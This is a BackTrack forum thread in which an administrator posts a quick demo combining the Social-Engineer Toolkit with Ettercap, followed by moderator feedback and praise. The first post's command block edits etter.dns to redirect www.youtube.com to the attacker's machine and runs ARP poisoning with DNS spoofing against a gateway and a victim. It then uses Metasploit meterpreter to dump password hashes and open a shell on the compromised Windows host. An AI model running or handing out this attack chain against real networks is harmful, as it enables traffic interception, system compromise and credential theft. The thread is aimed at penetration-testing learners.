Results 1 to 7 of 7

Thread: SET & Ettercap (quick demo)

  1. #1
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default SET & Ettercap (quick demo)

    Ok I know SET has ettercap integrated in it for use but it didn't work when I made the tutorial., ReL1K only told me today that he managed to fix it !!!!

    Video Blip.tv: Sickness - SET & Ettercap java applet
    Video Blog: SET & Ettercap.

    Commands:

    Code:
    root@bt:-# cd /pentest/exploits/SET
    root@bt:-# nano config/set_config
    root@bt:-# ./set
    (SET SETUP)…
    
    root@bt:-# nano /usr/share/ettercap/etter.dns
    
    www.youtube.com A 192.168.1.64
    
    root@bt:-# ettercap -T -i wlan0 -q -P dns_spoof -M ARP /192.168.1.254/ /192.168.1.67/
    
    msf> sessions -l
    msf> sessions -i 1
    meterpreter> use priv
    meterpreter> hashdump
    meterpreter> shell
    
    C:\Documents and Settings\UFO\Desktop> ipconfig
    Hope you like it.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: SET & Ettercap (quick demo)

    Nice video however I don't see what you actually did when you opened the "set_config". I also don't see it above in the "commands box". It may just be me missing it, but another line above stating it would be nice to have.

    Also maybe sharing with others (that don't know) how to get this set + ettercap combo you speak of.

  3. #3
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Ettercap (quick demo)

    Quote Originally Posted by Archangel-Amael View Post
    Nice video however I don't see what you actually did when you opened the "set_config". I also don't see it above in the "commands box". It may just be me missing it, but another line above stating it would be nice to have.

    Also maybe sharing with others (that don't know) how to get this set + ettercap combo you speak of.
    Yep I will make a tutorial now detailed about how to use them couldn't make one at that time because it didn't work.
    Oh and the set_config file was just for users to see what to enable or disable. Another detailed one comming up.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  4. #4
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: SET & Ettercap (quick demo)

    Quote Originally Posted by sickness View Post
    Yep I will make a tutorial now detailed about how to use them couldn't make one at that time because it didn't work.
    Oh and the set_config file was just for users to see what to enable or disable. Another detailed one comming up.

    Yes I understand what the set_config file is, my point is I don't see what you changed in the file (if anything) if you changed nothing from a default state then why bother to show it ? If you did change something from another tutorial or point in time that is not relevant to the guide then it might be better if you at least add what you changed.

  5. #5
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Ettercap (quick demo)

    Quote Originally Posted by Archangel-Amael View Post
    Yes I understand what the set_config file is, my point is I don't see what you changed in the file (if anything) if you changed nothing from a default state then why bother to show it ? If you did change something from another tutorial or point in time that is not relevant to the guide then it might be better if you at least add what you changed.
    Understood
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  6. #6
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Thumbs up Re: SET & Ettercap (quick demo)

    OMG thats top notch dude! Amazing stuff there! I know this is an old thread but damn good none the less

  7. #7
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Ettercap (quick demo)

    Quote Originally Posted by VulcanX View Post
    OMG thats top notch dude! Amazing stuff there! I know this is an old thread but damn good none the less
    Yea pretty cool now you can do all this by just using the ettercap option from SET, it works now !
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Similar Threads

  1. Quick Autopwn question, seriously quick.
    By bt4pf355 in forum OLD Newbie Area
    Replies: 6
    Last Post: 01-18-2010, 10:17 PM
  2. How to set up a demo network
    By knithx in forum OLD Newbie Area
    Replies: 5
    Last Post: 10-08-2009, 12:39 AM
  3. Compiz-Fusion Demo
    By purehate in forum OLD General IT Discussion
    Replies: 21
    Last Post: 11-29-2007, 09:31 PM
  4. Office Demo
    By seag33k in forum OLD Pentesting
    Replies: 10
    Last Post: 07-08-2007, 05:09 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •